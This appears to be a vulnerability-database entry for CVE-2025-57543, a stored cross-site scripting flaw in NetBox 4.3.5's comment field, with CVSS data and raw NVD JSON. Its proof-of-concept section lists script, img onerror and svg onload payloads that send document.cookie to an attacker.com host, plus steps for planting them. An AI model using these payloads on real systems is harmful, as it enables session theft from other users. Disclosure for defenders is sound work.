Security Vulnerability Report
中文
CVE-2025-57543 CVSS 6.1 MEDIUM

CVE-2025-57543

Published: 2026-03-16 16:16:13
Last Modified: 2026-03-20 13:56:20
Source: [email protected]

Description

Cross Site scripting vulnerability (XSS) in NetBox 4.3.5 "comment" field on object forms. An attacker can inject arbitrary HTML, which will be rendered in the web UI when viewed by other users. This could potentially lead to user interface redress attacks or be escalated to XSS in certain contexts.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:netbox:netbox:4.3.5:*:*:*:*:*:*:* - VULNERABLE
NetBox 4.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-57543 NetBox XSS PoC --> <!-- Inject this payload in the 'comment' field of any object form in NetBox 4.3.5 --> <!-- Basic script injection --> <script>alert(document.cookie)</script> <!-- Event handler injection --> <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)"> <!-- Stored XSS via comment field --> <svg/onload=fetch('http://attacker.com/log?data='+btoa(document.cookie))> <!-- Steal session token --> <script> fetch('https://attacker.com/exfil?token='+encodeURIComponent(document.cookie)) </script> <!-- NetBox specific PoC - Comment field injection --> <!-- Steps: --> <!-- 1. Navigate to any NetBox object form (Device, IP Address, etc.) --> <!-- 2. Fill in the 'comments' field with the XSS payload above --> <!-- 3. Save the object --> <!-- 4. When any user views this object, the XSS will be executed -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57543", "sourceIdentifier": "[email protected]", "published": "2026-03-16T16:16:13.030", "lastModified": "2026-03-20T13:56:20.397", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site scripting vulnerability (XSS) in NetBox 4.3.5 \"comment\" field on object forms. An attacker can inject arbitrary HTML, which will be rendered in the web UI when viewed by other users. This could potentially lead to user interface redress attacks or be escalated to XSS in certain contexts."}, {"lang": "es", "value": "Vulnerabilidad de scripting entre sitios (XSS) en NetBox 4.3.5 en el campo 'comment' de los formularios de objetos. Un atacante puede inyectar HTML arbitrario, que se renderizará en la interfaz de usuario web cuando sea visto por otros usuarios. Esto podría llevar potencialmente a ataques de manipulación de la interfaz de usuario o ser escalado a XSS en ciertos contextos."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:netbox:netbox:4.3.5:*:*:*:*:*:*:*", "matchCriteriaId": "0938F464-63D4-4601-8C2F-8F69E7CED8C9"}]}]}], "references": [{"url": "https://gist.github.com/MerttTuran/d94acff59816bfd9492d1a738e89ebb4", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gist.github.com/MerttTuran/d94acff59816bfd9492d1a738e89ebb4", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.